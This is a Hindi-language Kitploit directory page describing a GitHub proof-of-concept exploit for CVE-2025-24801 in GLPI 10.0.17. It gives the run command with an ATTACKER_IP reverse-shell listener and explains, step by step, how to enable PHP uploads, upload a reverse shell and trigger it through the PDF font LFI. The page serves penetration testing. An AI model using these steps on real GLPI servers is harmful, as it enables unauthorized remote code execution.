Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24801 — CVE-2025-24801 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GLPI 10.0.17 में LFI-से-RCE भेद्यता। लॉगिन स्वचालित करता है, PHP अपलोड सक्षम करता है, और अधिकृत सुरक्षा परीक्षण के लिए रिवर्स शेल अपलोड करता है। | Kitploit
उपकरण/GitHubGitHub/fatkz/cve-2025-24801
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubfatkz/cve-2025-24801

CVE-2025-24801

CVE-2025-24801 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GLPI 10.0.17 में LFI-से-RCE भेद्यता। लॉगिन स्वचालित करता है, PHP अपलोड सक्षम करता है, और अधिकृत सुरक्षा परीक्षण के लिए रिवर्स शेल अपलोड करता है।

रिपॉजिटरी देखें
31161 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24801 GLPI RCE के लिए PoC

इस रिपॉजिटरी में एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट (poc.py) है जो CVE-2025-24801 का शोषण करती है, जो GLPI 10.0.17 में एक LFI-से-RCE भेद्यता है। यह स्वचालित करता है:

  • GLPI में लॉगिन करना
  • दस्तावेज़ प्रकार सेटिंग्स अपडेट करके .php अपलोड सक्षम करना
  • AJAX फ़ाइल अपलोड एंडपॉइंट के माध्यम से PHP रिवर्स शेल अपलोड करना

🛠️ स्थापना

git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 उपयोग

python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: GLPI इंस्टेंस का आधार URL (जैसे https://example.com/glpi)
  • --user / --password: वैध GLPI तकनीशियन क्रेडेंशियल्स
  • --lhost / --lport: रिवर्स शेल लिसनर के लिए हमलावर का IP और पोर्ट

स्क्रिप्ट पहले दस्तावेज़ प्रकार को अपडेट करने के लिए डिफ़ॉल्ट रूप से --doc-id 1 का उपयोग करती है।

निष्पादन के बाद, स्क्रिप्ट निम्नलिखित करेगी:

  1. लॉग इन करें और एक सत्र स्थापित करें
  2. दस्तावेज़ प्रकार ID 1 अपडेट करके .php अपलोड सक्षम करें
  3. PHP रिवर्स शेल पेलोड युक्त exploit.php अपलोड करें

फिर आपको RCE प्राप्त करने के लिए PDF फ़ॉन्ट इन्क्लूड में अपलोड की गई फ़ाइल का नाम निर्दिष्ट करके (उदाहरण के लिए, रिपोर्ट एक्सपोर्ट सुविधा के माध्यम से) मैन्युअल रूप से LFI को ट्रिगर करना होगा।

📑 यह कैसे काम करता है

  1. लॉगिन: /front/login.php से CSRF टोकन निकालता है और प्रमाणीकरण के लिए क्रेडेंशियल पोस्ट करता है।
  2. PHP अपलोड सक्षम करें: /front/documenttype.form.php?id=1 प्राप्त करता है, CSRF टोकन पार्स करता है, और अनुमत एक्सटेंशन में php जोड़ता है।
  3. शेल अपलोड करें: CSRF टोकन के लिए /front/ticket.form.php प्राप्त करता है, फिर PHP रिवर्स शेल अपलोड करने के लिए /ajax/fileupload.php (साथ में X-Requested-With: XMLHttpRequest) का उपयोग करता है।
  4. RCE ट्रिगर करें: रिपोर्ट एक्सपोर्ट के दौरान pdffont पैरामीटर में अपलोड की गई शेल फ़ाइल का नाम निर्दिष्ट करके PDF फ़ॉन्ट LFI को मैन्युअल रूप से आमंत्रित करें।

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इसका उपयोग न करें।


शैक्षिक और अधिकृत पेंटेस्टिंग उद्देश्यों के लिए बनाया गया।

टूल डाउनलोड करें